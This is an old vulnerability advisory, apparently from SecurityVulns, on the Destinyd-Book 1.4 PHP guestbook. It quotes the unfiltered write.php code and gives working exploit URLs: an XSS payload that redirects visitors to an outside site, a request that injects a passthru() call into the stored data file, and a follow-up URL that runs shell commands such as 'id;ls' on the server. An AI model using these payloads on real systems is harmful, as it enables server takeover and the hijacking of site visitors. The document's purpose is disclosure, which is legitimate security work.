XSS end execution commands in Destinyd 1.4

2004-01-16T00:00:00
ID SECURITYVULNS:DOC:5641
Type securityvulns
Reporter Securityvulns
Modified 2004-01-16T00:00:00

Description

has found: x64rst # email: x64rst@mail.ru #

XSS end execution commands in Destinyd 1.4 ##

// Destinyd-Book v1.4, Guestbook by Martijn## // http://www.destinyd.com ## // The Destiny group ##

script write.php does not filter array,as a result possible form code which contains php, java script. ............................ if($data) { $newtext == stripslashes($newtext); fputs($data, "<? \n \$name[] = \"$newname\"; \n" . "\$email[] = \"$newemail\";\n"); fputs($data, "\$pagename[] = \"$newpagename\"; \n" . "\$pageurl[] = \"$newpageurl\";\n" . "\$text[] = \"$newtext\";\n"); fputs($data, "\$datum[] = \"$date\";\n"); fclose($data); } $data = fopen("data/data.dat", "a"); $count = "0"; $max--;

    while&#40;$name[$count] != &quot;&quot;&#41;
    {

$text[$count] == stripslashes($text[$count]); fputs($data, "\$name[] = \"$name[$count]\";\n"); fputs($data, "\$email[] = \"$email[$count]\";\n"); fputs($data, "\$pagename[] = \"$pagename[$count]\";\n"); fputs($data, "\$pageurl[] = \"$pageurl[$count]\";\n"); fputs($data, "\$text[] = \"$text[$count]\";\n"); fputs($data, "\$datum[] = \"$datum[$count]\";\n"); $count++; if($count == $max) { break; } } .....................................

exploits:

example: XSS#


1.www.site.com/guestbook/write.php?entry=ok&newname=vagner&newemail=vagner@hotbox.com&newtext=Speed news text please!&name[]=Bill&email[]=Bill@microsoft.com&pageurl[]=http://&text[]=hi<script>alert('Hello From x64rst@mail.ru');document.location=%27http://www.jopa.ru%27;%3C/script%3E&datum[]=07.11.2003 @ 22:07


example: execution commands#


1. www.site.com/guestbook/write.php?entry=ok&newname=vagner&newemail=vagner@hotbox.com&newtext=Speed news text please!&name[]=Bill&email[]=Bill@microsoft.com&pageurl[]=http://";%20if($pagename[0]!="")%20{passthru("$pagename[0]");}%20$X64rst="&text[]=Hi you site very good!&datum[]=07.11.2003 @ 22:07

2. www.site.com/guestbook/index.php?pagename[0]=id;ls

end./s